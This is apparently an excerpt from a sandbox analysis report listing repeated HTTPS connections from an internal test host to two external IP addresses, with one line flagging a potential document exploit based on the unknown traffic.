Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
